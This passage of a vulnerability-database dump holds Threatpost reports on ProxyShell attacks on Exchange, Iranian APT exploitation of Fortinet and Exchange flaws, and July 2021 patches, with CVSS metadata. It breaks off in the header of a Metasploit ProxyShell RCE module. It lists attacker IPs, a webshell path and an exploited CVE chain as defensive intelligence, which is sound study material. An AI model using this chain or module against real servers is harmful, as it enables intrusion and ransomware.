\u201cExchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from @orange_8361\u2019s initial talk.\u201d\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\n## Dangerous Skating on the New Attack Surface\n\nIn [a post](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) on Sunday, Tsai recounted the in-the-wild ProxyLogon proof of concept that Devco reported to MSRC in late February, explaining that it made the researchers \u201cas curious as everyone after eliminating the possibility of leakage from our side through a thorough investigation.\n\n\u201cWith a clearer timeline appearing and more discussion occurring, it seems like this is not the first time that something like this happened to Microsoft,\u201d he continued. Mail server is both a highly valuable asset and a seemingly irresistible target for attackers, given that it holds businesses\u2019 confidential secrets and corporate data.\n\n\u201cIn other words, controlling a mail server means controlling the lifeline of a company,\u201d Tsai explained. \u201cAs the most common-use email solution, Exchange Server has been the top target for hackers for a long time. Based on our research, there are more than four hundred thousands Exchange Servers exposed on the Internet. Each server represents a company, and you can imagine how horrible it is while a severe vulnerability appeared in Exchange Server.\u201d\n\nDuring his Black Hat presentation, Tsai explained that the new attack surface his team discovered is based on \u201ca significant change in Exchange Server 2013, where the fundamental protocol handler, Client Access Service (CAS), splits into frontend and backend\u201d \u2013 a change that incurred \u201cquite an amount of design\u201d and yielded eight vulnerabilities, consisting of server-side bugs, client-side bugs and crypto bugs.\n\nHe chained the bugs into three attack vectors: The now-infamous [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) that induced [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) a few months back, the ProxyShell vector that\u2019s now under active attack, and another vector called ProxyOracle.\n\n\u201cThese attack vectors enable any unauthenticated attacker to uncover plaintext passwords and even execute arbitrary code on Microsoft Exchange Servers through port 443, which is exposed to the Internet by about 400,000 Exchange Servers,\u201d according to the presentation\u2019s introduction.\n\nThe three Exchange vulnerabilities, all of which are [patched](<https://threatpost.com/microsoft-crushes-116-bugs/167764/>), that Tsai chained for the ProxyShell attack:\n\n * [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) \u2013 Pre-auth path confusion leads to ACL bypass\n * [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>) \u2013 Elevation of privilege on Exchange PowerShell backend\n * [CVE-2021-31207](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207>) \u2013 Post-auth arbitrary file-write leads to RCE\n\nProxyShell earned the Devcore team a $200,000 bounty after they used the bugs to take over an Exchange server at the [Pwn2Own 2021](<https://twitter.com/thezdi/status/1379467992862449664>) contest in April.\n\nDuring his Black Hat talk, Tsai said that he discovered the Exchange vulnerabilities when targeting the Microsoft Exchange CAS attack surface. As Tsai explained, CAS is \u201ca fundamental component\u201d of Exchange.\n\nHe referred to [Microsoft\u2019s documentation](<https://docs.microsoft.com/en-us/exchange/architecture/architecture?view=exchserver-2019>), which states:\n\n\u201cMailbox servers contain the Client Access services that accept client connections for all protocols. These frontend services are responsible for routing or proxying connections to the corresponding backend services on a Mailbox server.\u201d\n\n\u201cFrom the narrative you could realize the importance of CAS, and you could imagine how critical it is when bugs are found in such infrastructure. CAS was where we focused on, and where the attack surface appeared,\u201d Tsai wrote. \u201cCAS is the fundamental component in charge of accepting all the connections from the client side, no matter if it\u2019s HTTP, POP3, IMAP or SMTP, and proxies the connections to the corresponding backend service.\u201d\n\n## ProxyShell Just the \u2018Tip of the Iceberg\u2019\n\nOut of all the bugs he found in the new attack surface, Tsai dubbed [CVE-2020-0688](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) (an RCE vulnerability that involved a hard-coded cryptographic key in Exchange) the \u201cmost surprising.\u201d\n\n\u201cWith this hard-coded key, an attacker with low privilege can take over the whole Exchange Server,\u201d he wrote. \u201cAnd as you can see, even in 2020, a silly, hard-coded cryptographic key could still be found in an essential software like Exchange. This indicated that Exchange is lacking security reviews, which also inspired me to dig more into the Exchange security.\u201d\n\nBut the \u201cmost interesting\u201d flaw is [CVE-2018-8581](<https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange>), he said, which was disclosed by someone who cooperated with ZDI. Though it\u2019s a \u201csimple\u201d server-side request forgery (SSRF), it could be combined with NTLM Relay, enabling the attacker to \u201cturn a boring SSRF into [something really fancy,\u201d Tsai said.](<https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/>)\n\nFor example, it could \u201cdirectly control the whole Domain Controller through a low-privilege account,\u201d Tsai said.\n\n## Autodiscover Figures into ProxyShell\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-are-getting-hacked-via-proxyshell-exploits/>) reported, during his presentation, Tsai explained that one of the components of the ProxyShell attack chain targets the Microsoft Exchange [Autodiscover](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>) service: a service that eases configuration and deployment by providing clients access to Exchange features with minimal user input.\n\nTsai\u2019s talk evidently triggered a wave of scanning for the vulnerabilities by attackers.\n\nAfter watching the presentation, other security researchers replicated the ProxyShell exploit. The day after Tsai\u2019s presentation, last Friday, PeterJson and Nguyen Jang [published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>) more detailed technical information about their successful reproduction of the exploit.\n\nSoon after, Beaumont [tweeted](<https://twitter.com/GossiTheDog/status/1422178411385065476?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1422178411385065476%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fwww.bleepingcomputer.com%2Fnews%2Fmicrosoft%2Fmicrosoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now%2F>) about a threat actor who was probing his Exchange honeypot using the [Autodiscover service](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/autodiscover?view=exchserver-2019>). As of yesterday, Aug. 12, those servers were being targeted using autodiscover.json, he tweeted.\n\n> Exchange ProxyShell exploitation wave has started, looks like some degree of spraying. Random shell names for access later. Uses foo name from [@orange_8361](<https://twitter.com/orange_8361?ref_src=twsrc%5Etfw>)'s initial talk.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [August 12, 2021](<https://twitter.com/GossiTheDog/status/1425844380376735746?ref_src=twsrc%5Etfw>)\n\nAs of Thursday, ProxyShell was dropping a 265K webshell \u2013 the minimum file size that can be created via ProxyShell due to its use of the Mailbox Export function of Exchange Powershell to create PST files \u2013 to the \u2018c:\\inetpub\\wwwroot\\aspnet_client\\\u2019 folder. Warren shared a sample with BleepingComputer that showed that the webshells consist of \u201ca simple authentication-protected script that the threat actors can use to upload files to the compromised Microsoft Exchange server.\u201d\n\nBad Packets told the outlet that as of Thursday, was seeing threat actors scanning for vulnerable ProxyShell devices from IP addresses in the U.S., Iran and the Netherlands, using the domains @abc.com and @1337.com, from the known addresses 3.15.221.32 and 194.147.142.0/24.\n\n![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-13T18:56:27", "type": "threatpost", "title": "Exchange Servers Under Active Attack via ProxyShell Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8581", "CVE-2020-0688", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-13T18:56:27", "id": "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "href": "https://threatpost.com/exchange-servers-attack-proxyshell/168661/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-18T02:26:11", "description": "A state-backed Iranian threat actor has been using multiple CVEs \u2013 including both serious Fortinet vulnerabilities for months and a Microsoft Exchange ProxyShell weakness for weeks \u2013 looking to gain a foothold within networks before moving laterally and launching [BitLocker](<https://threatpost.com/hades-ransomware-connections-hafnium/165069/>) ransomware and other nastiness.\n\nA joint [advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) published by CISA on Wednesday was meant to highlight the ongoing, malicious cyber assault, which has been tracked by the FBI, the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC) and the United Kingdom\u2019s National Cyber Security Centre (NCSC). All of the security bodies have traced the attacks to an Iranian government-sponsored advanced persistent threat (APT).\n\nThe Iranian APT has been exploiting Fortinet vulnerabilities since at least March 2021 and a Microsoft Exchange ProxyShell vulnerability since at least October 2021, according to the alert. The weaknesses are granting the attackers initial access to systems that\u2019s then leading to follow-on operations including ransomware, data exfiltration or encryption, and extortion.\n\nThe APT has used the same Microsoft Exchange vulnerability in Australia.\n\n## CISA Warning Follows Microsoft Report on Six Iranian Threat Groups\n\nCISA\u2019s warning came on the heels of [an analysis](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) of the evolution of Iranian threat actors released by Microsoft\u2019s Threat Intelligence Center (MSTIC) on Tuesday.\n\nMSTIC researchers called out three trends they\u2019ve seen emerge since they started tracking six increasingly sophisticated Iranian APT groups in September 2020:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\nThey\u2019ve seen ransomware attacks coming in waves, averaging every six to eight weeks, as shown in the timeline below.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/17104422/Fig1b-ransomware-timeline.jpg>)\n\nTimeline of ransomware attacks by Iranian threat actors. Source: MSTIC.\n\nIn keeping with what CISA described on Wednesday, MSTIC has seen the Iran-linked [Phosphorous group](<https://threatpost.com/apt-ta453-siphons-intel-mideast/167715/>) \u2013 aka a number of names, including Charming Kitten, TA453, APT35, Ajax Security Team, NewsBeef and Newscaster \u2013 globally target the Exchange and Fortinet flaws \u201cwith the intent of deploying ransomware on vulnerable networks.\u201d\n\nThe researchers pointed to a recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describing a similar intrusion, in which the attackers exploited vulnerabilities in on-premise Exchange Servers to compromise their targets\u2019 environments and encrypt systems via BitLocker ransomware: activity that MSTIC also attributed to Phosphorous.\n\n## No Specific Sectors Targeted\n\nThe threat actors covered in CISA\u2019s alert aren\u2019t targeting specific sectors. Rather, they\u2019re focused on exploiting those irresistible Fortinet and Exchange vulnerabilities.\n\nThe alert advised that the APT actors are \u201cactively targeting a broad range of victims across multiple U.S. critical infrastructure sectors, including the Transportation Sector and the Healthcare and Public Health Sector, as well as Australian organizations.\u201d\n\n## Malicious Activity\n\nSince March, the Iranian APT actors have been scanning devices on ports 4443, 8443 and 10443 for the much-exploited, serious Fortinet FortiOS vulnerability tracked as [CVE-2018-13379](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) \u2013 a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nIt\u2019s d\u00e9j\u00e0 vu all over again: In April, CISA had [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) about those same ports being scanned by cyberattackers looking for the Fortinet flaws. In its April alert ([PDF](<https://www.ic3.gov/media/news/2021/210402.pdf>)), CISA said that it looked like the APT actors were going after access \u201cto multiple government, commercial, and technology services networks.\u201d\n\nThat\u2019s what APT actors do, CISA said: They exploit critical vulnerabilities like the Fortinet CVEs \u201cto conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spearphishing campaigns, website defacements, and disinformation campaigns.\u201d\n\nCVE-2018-13379 was just one of three security vulnerabilities in the Fortinet SSL VPN that the security bodies had seen being used to gain a foothold within networks before moving laterally and carrying out recon, as the FBI and CISA said in the April alert.\n\nAccording to Wednesday\u2019s report, the APT actors are also enumerating devices for the remaining pair of FortiOS vulnerabilities in the trio CISA saw being exploited in March, which are:\n\n * [CVE-2020-12812](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>), an improper-authentication vulnerability in SSL VPN in FortiOS that could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username, and\n * [CVE-2019-5591](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>): a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n\u201cThe Iranian Government-sponsored APT actors likely exploited these vulnerabilities to gain access to vulnerable networks,\u201d according to Wednesday\u2019s alert.\n\nIn May, the same Iranian actors also exploited a Fortinet FortiGate firewall to gain access to a U.S. municipal government\u2019s domain. \u201cThe actors likely created an account with the username \u201celie\u201d to further enable malicious activity,\u201d CISA said, pointing to a previous FBI flash alert ([PDF](<https://www.ic3.gov/media/news/2021/210527.pdf>)) on the incident.\n\nIn June, the same APT actors exploited another FortiGate security appliance to access environmental control networks associated with a U.S. children\u2019s hospital after likely leveraging a server assigned to IP addresses 91.214.124[.]143 and 162.55.137[.]20: address that the FBI and CISA have linked with Iranian government cyber activity. They did it to \u201cfurther enable malicious activity against the hospital\u2019s network,\u201d CISA explained.\n\n\u201cThe APT actors accessed known user accounts at the hospital from IP address 154.16.192[.]70, which FBI and CISA judge is associated with government of Iran offensive cyber activity,\u201d CISA said.\n\n## Yet More Exchange ProxyShell Attacks\n\nFinally, the gang turned to exploiting a Microsoft Exchange ProxyShell vulnerability \u2013 CVE-2021-34473 \u2013 last month, in order to, again, gain initial access to systems in advance of follow-on operations. ACSC believes that the group has also used [CVE-2021-34473](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) in Australia.\n\nProxyShell is a name given to an attack that chains a trio of vulnerabilities together (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), to enable unauthenticated attackers to perform remote code execution (RCE) and to snag plaintext passwords.\n\nThe attack was outlined in a presentation ([PDF](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>)) given by Devcore principal security researcher [Orange Tsai](<https://twitter.com/orange_8361>) at Black Hat in April. In it, Tsai disclosed an entirely new attack surface in Exchange, and a [barrage](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) of [attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) soon followed. August was glutted with reports of threat actors exploiting ProxyShell to launch [webshell attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>), as well as to deliver [LockFile ransomware](<https://pbs.twimg.com/media/E9TmPo6XMAYCnO-?format=jpg&name=4096x4096>).\n\n## Indications of Compromise\n\n[CISA\u2019s detailed alert](<https://us-cert.cisa.gov/ncas/alerts/aa21-321a>) gives a laundry list of tactics and techniques being used by the Iran-linked APT.\n\nOne of many indicators of compromise (IOC) that\u2019s been spotted are new user accounts that may have been created by the APT on domain controllers, servers, workstations and active directories [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>), [T1136.002](<https://attack.mitre.org/versions/v10/techniques/T1136/002>)].\n\n\u201cSome of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization,\u201d CISA advised.\n\nBesides unrecognized user accounts or accounts established to masquerade as existing accounts, these account usernames may be associated with the APT\u2019s activity:\n\n * Support\n * Help\n * elie\n * WADGUtilityAccount\n\nIn its Tuesday analysis, MSTIC researchers cautioned that Iranian operators are flexible, patient and adept, \u201c[having] adapted both their strategic goals and tradecraft.\u201d Over time, they said, the operators have evolved into \u201cmore competent threat actors capable of conducting a full spectrum of operations, including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, these threat actors are proved capable of all these operations, researchers said:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** TODAY, Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event**__**!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T17:04:01", "type": "threatpost", "title": "Exchange, Fortinet Flaws Being Exploited by Iranian APT, CISA Warns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-17T17:04:01", "id": "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "href": "https://threatpost.com/exchange-fortinet-exploited-iranian-apt-cisa/176395/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-13T22:17:17", "description": "Three bugs under active exploit were squashed by Microsoft Tuesday, part of its [July security roundup](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) of fixes for Windows, Microsoft Office, SharePoint Server and Exchange Server. In all, Microsoft patched 116 bugs. Twelve bugs are rated critical, 103 rated important and one classified as moderate in severity.\n\nBugs under active attack include a critical scripting engine memory corruption ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>)) flaw and two additional Windows kernel elevation-of-privilege vulnerabilities ([CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>), [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>)), both with a severity rating of important. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)The hundred-plus bug fixes add to a rough July for Microsoft, which rolled out an out-of-band fix for a Windows print spooler remote-code-execution vulnerability ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>)), dubbed [PrintNightmare](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>), earlier this month. The nightmare bug, first disclosed in April, was later discovered to be more serious than initially thought.\n\n## **Public, But Not Exploited **\n\nFive of the bugs patched by Microsoft ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>), [CVE-2021-33781](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33781>), [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>), [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>), [CVE-2021-34492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34492>)) were publicly known, albeit not exploited. Only one of those bugs (CVE-2021-34473), a Microsoft Exchange Server remote code execution (RCE) vulnerability, has a severity rating of critical, with a CVSS score of 9.1. The bug, one of the highest rated in terms of importance to fix this month, was part of Microsoft\u2019s April Patch Tuesday roundup of fixes, according to commentary by [Cisco Talos](<https://blog.talosintelligence.com/2021/07/microsoft-patch-tuesday-for-july-2021.html>).\n\n\u201cThis vulnerability was already patched in Microsoft\u2019s April security update but was mistakenly not disclosed. Users who already installed the April 2021 update are already protected from this vulnerability, though it is worth noting that this issue was part of a series of zero-days in Exchange Server used in a wide-ranging APT attack,\u201d wrote Talos authors Jon Munshaw and Jaeson Schultz.\n\n## **Patching Priorities **\n\nThe most pressing of bugs is a memory corruption vulnerability (CVE-2021-34448) in Windows Server\u2019s scripting engine that is triggered when the user opens a specially crafted file, either attached to an email or a compromised website.\n\n\u201c[This bug] is the most serious vulnerability for me. It is elegant in its simplicity, letting an attacker gain remote code execution just by getting the target to visit a domain,\u201d wrote Kevin Breen, director of cyber threat research with Immersive Labs, in his Patch Tuesday commentary. \u201cWith malicious, yet professional looking, domains carrying valid TLS certificates a regular feature nowadays, seamless compromise would be a trivial matter. Victims could even be attacked by sending .js or .hta files in targeted phishing emails.\u201d\n\nCisco Talos advises system admin to prioritize a patch for a critical bug ([CVE-2021-34464](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34464>)) in Microsoft\u2019s free Defender anti-virus software. \u201cThis issue could allow an attacker to execute remote code on the victim machine. However, users do not need to take any actions to resolve this issue, as the update will automatically install. The company has listed steps in its advisory users can take to ensure the update is properly installed,\u201d wrote Munshaw and Schultz.\n\nResearchers have also identified three SharePoint Server bugs ([CVE-2021-34520](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34520>), [CVE-2021-34467](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34467>), [CVE-2021-34468](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34468>)) as priority patches. Each allow an attacker to execute remote code on the victim machine. All are rated important. However, Microsoft reports that exploitation is \u201cmore likely\u201d with these vulnerabilities, Talos said.\n\nZero Day Initiative\u2019s Dustin Childs recommends tackling ([CVE-2021-34458](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34458>)), a Windows kernel vulnerability. \u201cIt\u2019s rare to see remote code execution in a kernel bug, but this is that rare exception. This bug impacts systems hosting virtual machines with single root input/output virtualization (SR-IOV) devices,\u201d [he wrote](<https://www.zerodayinitiative.com/blog/2021/7/13/the-july-2021-security-update-review>).\n\n\u201cIt\u2019s not clear how widespread this configuration is, but considering this bug rates as a CVSS 9.9, it\u2019s not one to ignore. If you have virtual machines in your environment, test and patch quickly,\u201d Childs added.\n\nIn related news, [Adobe\u2019s July patch roundup](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>), also released Tuesday, includes fixes for its ubiquitous and free PDF reader Acrobat 2020 and other software such as Illustrator and Bridge. In all, Adobe patched 20 Acrobat bugs, with nine rated important.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-13T21:26:27", "type": "threatpost", "title": "Microsoft Crushes 116 Bugs, Three Actively Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-31979", "CVE-2021-33771", "CVE-2021-33779", "CVE-2021-33781", "CVE-2021-34448", "CVE-2021-34458", "CVE-2021-34464", "CVE-2021-34467", "CVE-2021-34468", "CVE-2021-34473", "CVE-2021-34492", "CVE-2021-34520", "CVE-2021-34523", "CVE-2021-34527"], "modified": "2021-07-13T21:26:27", "id": "THREATPOST:98D815423018872E6E596DAA8131BF3F", "href": "https://threatpost.com/microsoft-crushes-116-bugs/167764/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-08-20T15:47:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "PACKETSTORM:163895", "href": "https://packetstormsecurity.com/files/163895/Microsoft-Exchange-ProxyShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'winrm' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyShell RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker to bypass the authentication (CVE-2021-31207), impersonate an \narbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, \nExchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, \nExchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery \n'Jang (@testanull)', # Vulnerability analysis \n'PeterJson', # Vulnerability analysis \n'brandonshi123', # Vulnerability analysis \n'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template \n'Spencer McIntyre', # Metasploit module \n'wvu' # Testing \n], \n'References' => [ \n[ 'CVE', '2021-34473' ], \n[ 'CVE', '2021-34523' ], \n[ 'CVE', '2021-31207' ], \n[ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ], \n[ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ], \n[ 'URL', 